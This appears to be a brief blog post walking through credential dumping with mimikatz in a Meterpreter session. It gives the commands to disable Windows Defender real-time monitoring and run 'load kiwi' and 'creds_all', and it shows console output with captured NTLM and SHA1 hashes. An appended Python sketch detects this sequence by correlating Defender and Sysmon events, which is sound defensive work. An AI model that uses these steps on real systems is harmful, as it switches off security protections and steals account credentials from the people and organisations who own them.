This is going to be a very quick post on how to use mimikatz if you are already admin.

  1. Start “shell”
  2. Enter “Powershell”
  3. Disable real-time monitoring: “Set-MpPreference -DisableRealtimeMonitoring $true”
  4. Exit the shell: “exit”
  5. Start mimikatz: “load kiwi”
  6. Request all credentials: “creds_all”

```
C:\Windows\system32>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> Set-MpPreference -DisableRealtimeMonitoring $true
Set-MPPreference -DisableRealtimeMonitoring $true
PS C:\Windows\system32> exit
exit

C:\Windows\system32>^C
Terminate channel 2? [y/N] y
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username   Domain  NTLM                              SHA1                                      DPAPI
--------   ------  ----                              ----                                      -----
FILESRV$           6a6854d2e05cef0dbd936545d7696771  fd32da38ad7d4c424e73642987aac5826b3a11c6
fileadmin          ceab6425e23a2cd45bfd2a04bd84047a  c3448fddbe000d689f2a6fc580dcb354a3d16f67  006209af8fc4bd917d6cdf7087bda3ea
...
```
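
The sequence above leaves a recognisable trail: Defender logs real-time protection being turned off (event 5001) and Sysmon, if deployed, logs the later read of LSASS as a ProcessAccess event (ID 10). The following is an added detection sketch, not code from this post; the flat event layout, host names, process paths and the 15-minute window are assumptions, and the sample events are constructed.

```python
from datetime import datetime, timedelta

RTP_ENABLED, RTP_DISABLED = 5000, 5001   # Windows Defender operational log event IDs
SYSMON_PROCESS_ACCESS = 10               # Sysmon ProcessAccess
LSASS_PATH = r"C:\Windows\System32\lsass.exe"

# Constructed sample events (not taken from the post). The dict layout, host
# names and source images are assumptions about a normalised log export.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:05", "host": "HOST-A", "source": "defender", "id": 5001},
    {"time": "2024-05-01T10:03:40", "host": "HOST-A", "source": "sysmon", "id": 10,
     "SourceImage": r"C:\Users\Public\svc.exe", "TargetImage": LSASS_PATH},
    # LSASS access on a host where protection was never disabled: no alert.
    {"time": "2024-05-01T10:05:00", "host": "HOST-B", "source": "sysmon", "id": 10,
     "SourceImage": r"C:\Tools\agent.exe", "TargetImage": LSASS_PATH},
    # Protection disabled, then re-enabled before the access: no alert.
    {"time": "2024-05-01T11:00:00", "host": "HOST-C", "source": "defender", "id": 5001},
    {"time": "2024-05-01T11:01:00", "host": "HOST-C", "source": "defender", "id": 5000},
    {"time": "2024-05-01T11:02:00", "host": "HOST-C", "source": "sysmon", "id": 10,
     "SourceImage": r"C:\Tools\agent.exe", "TargetImage": LSASS_PATH},
]

def correlate(events, window=timedelta(minutes=15)):
    """Return one alert per LSASS access that follows a real-time-protection
    disable on the same host within `window`, while protection is still off."""
    disabled_at = {}   # host -> time real-time protection was last disabled
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        host = ev["host"]
        if ev["source"] == "defender":
            if ev["id"] == RTP_DISABLED:
                disabled_at[host] = when
            elif ev["id"] == RTP_ENABLED:
                disabled_at.pop(host, None)      # protection restored, reset state
        elif ev["source"] == "sysmon" and ev["id"] == SYSMON_PROCESS_ACCESS:
            if ev.get("TargetImage", "").lower() != LSASS_PATH.lower():
                continue                         # only accesses to LSASS matter here
            since = disabled_at.get(host)
            if since is not None and when - since <= window:
                alerts.append({"host": host, "disabled_at": since.isoformat(),
                               "lsass_access_at": ev["time"],
                               "source_image": ev["SourceImage"]})
    return alerts

if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))
```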